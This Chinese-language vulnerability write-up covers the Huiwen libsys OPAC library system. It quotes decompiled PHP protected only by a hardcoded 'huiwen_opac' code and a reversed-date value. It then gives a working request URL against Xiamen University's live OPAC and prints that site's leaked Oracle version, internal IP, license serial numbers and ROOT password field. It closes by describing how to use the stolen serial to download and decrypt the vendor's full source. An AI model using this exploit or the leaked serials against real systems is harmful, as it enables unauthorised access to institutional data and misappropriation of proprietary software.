#### 0x00 介绍

汇文的libsys图书馆opac系统是高校使用得比较多的系统,用户有厦大,南京大学,大连理工,南开大学等多所学校。系统使用的是Oracle+php,无法从公开触到获取源码。

#### 0x01 获取代码

在汇文图书馆的官网上,可以下载到一些补丁,如截图所示。

下载OPAC重要安全BUG更新,可以看到一部分php文件,php使用了DeZend加密,可以使用工具解密,其中,/opac/ajax_libsys_view.php文件代码如下所示

```php
<?php
/*********************/
/* */
/* Dezend for PHP5 */
/* NWS */
/* Nulled.WS */
/* */
/*********************/

// Decompiled listing of /opac/ajax_libsys_view.php as quoted by the article.
// After a gate on two request parameters, the script runs a fixed set of
// queries and prints every result into the HTTP response.
//
// NOTE(review): no session, login or role check is visible in this file.
// Whether common.php enforces one cannot be told from here; the request shown
// in the article carries no session, which suggests it does not -- confirm.
// A diagnostic page like this should be removed from web-reachable paths or
// placed behind administrator authentication.
require_once( "common.php" );
require_once( "../include/hwopacpwd.php" );

// Both gate values are taken from $_REQUEST, i.e. from the client.
$pwd = $_REQUEST['code'];
$crc = $_REQUEST['crc'];

// date("md") is the server's current month and day, two digits each;
// strrev() reverses that string (the article's example: 1108 -> 8011).
$date = strrev( date( "md" ) );

// The only gate in this file. "code" is compared with a string constant that
// ships in the distributed file, and "crc" with a value derived from the
// calendar date, so neither is a secret held only by an administrator.
// Both comparisons use loose "!=". On mismatch the script prints "ERROR" and stops.
if ( $pwd != "huiwen_opac" || $date != $crc )
{
    echo "ERROR";
    return;
}

// Collects one single-entry array per result; printed at the end.
$ary = array( );

// All SQL below is constant text; no request data is placed into a statement.
// $dbh is not defined in this file -- presumably provided by common.php; confirm.

// Oracle version banners, one entry per row under the key "or".
$strSql = " SELECT * from v\$version ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$mode = OCI_FETCHSTATEMENT_BY_ROW;
$version = $stmt->fetchall( $mode );
$i = 0;
for ( ;$i < count( $version );++$i)
{
    $ary[] = array( "or" => $version[$i]['BANNER'] );
}

// Selected system parameters, keyed by their trimmed parameter code.
// Per the sample output quoted in the article, code 16 is the product serial
// number. str2utf8() is defined elsewhere (not shown here).
$strSql = "SELECT sys_para_code,sys_para_value FROM sys_comm_para where sys_para_code in ('01','02','14','16','17','24','47','98','99','ACS','RFID','THREE-M' ) order by 1 ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$mode = OCI_FETCHSTATEMENT_BY_ROW;
$para = $stmt->fetchall( $mode );
$i = 0;
for ( ;$i < count( $para );++$i)
{
    $ary[] = array( trim( $para[$i]['SYS_PARA_CODE'] ) => str2utf8( $para[$i]['SYS_PARA_VALUE'] ) );
}

// NOTE(review): reads the password column of the ROOT worker account and
// returns it to the client under the key "RT". Whether the column holds a
// hash or clear text cannot be told from this file. A credential column
// should never be written into a response.
$strSql = "SELECT password FROM lib_worker where wkr_no='ROOT' ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "RT" => $root['PASSWORD'] );

// Row count of the marc table, reported as "M".
$strSql = " select count(*) as cnt from marc ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "M" => $root['CNT'] );

// Row count of the indi_acct table, reported as "I".
$strSql = " select count(*) as cnt from indi_acct ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "I" => $root['CNT'] );

// Count of reader rows with redr_flag=1, reported as "R".
$strSql = " select count(*) as cnt from reader where redr_flag=1 ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "R" => $root['CNT'] );

// Dumps every collected entry with print_r(), separated by <br/>.
// Database values are written to the page without HTML escaping.
foreach ( $ary as $item )
{
    print_r( $item );
    echo "<br/>";
}
?>
```

可以看到,只要输入正确的code和crc即可执行if逻辑后面的一系列sql查询语句。

以厦门大学为例:http://opac.xmulib.org/opac/ajax_libsys_view.php?code=huiwen_opac&crc=8011
crc为月份日期按照倒序排列,例如今天是11月8日,则为1108倒序,即8011,结果如下:

```
Array ( [or] => Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi )
Array ( [or] => PL/SQL Release 10.2.0.1.0 - Production )
Array ( [or] => CORE10.2.0.1.0Production )
Array ( [or] => TNS for Solaris: Version 10.2.0.1.0 - Production )
Array ( [or] => NLSRTL Version 10.2.0.1.0 - Production )
Array ( [01] => 厦门大学 )
Array ( [02] => http://210.34.4.28 )
Array ( [14] => XMU,235010 )
Array ( [16] => 7050-7901-9735-7268-7661-9231-6348 )
Array ( [17] => Enterprise )
Array ( [24] => 5048535745485245495545207195195197180243209167205188202233185221 )
Array ( [47] => 0 )
Array ( [98] => 3174-19803-0843-1589-15002 )
Array ( [99] => 5.5.10 )
Array ( [RFID] => 2640-011-913-785 )
Array ( [THREE-M] => 2640-011-913-785 )
Array ( [RT] => )
Array ( [M] => 2332777 )
Array ( [I] => 4495757 )
Array ( [R] => 85492 )
```

其中,7050-7901-9735-7268-7661-9231-6348即为产品序列号,可以去官网下载完整安装包。

安装,在hwweb下即为php源码,使用Dezend解密程序解密即可拿到所有源码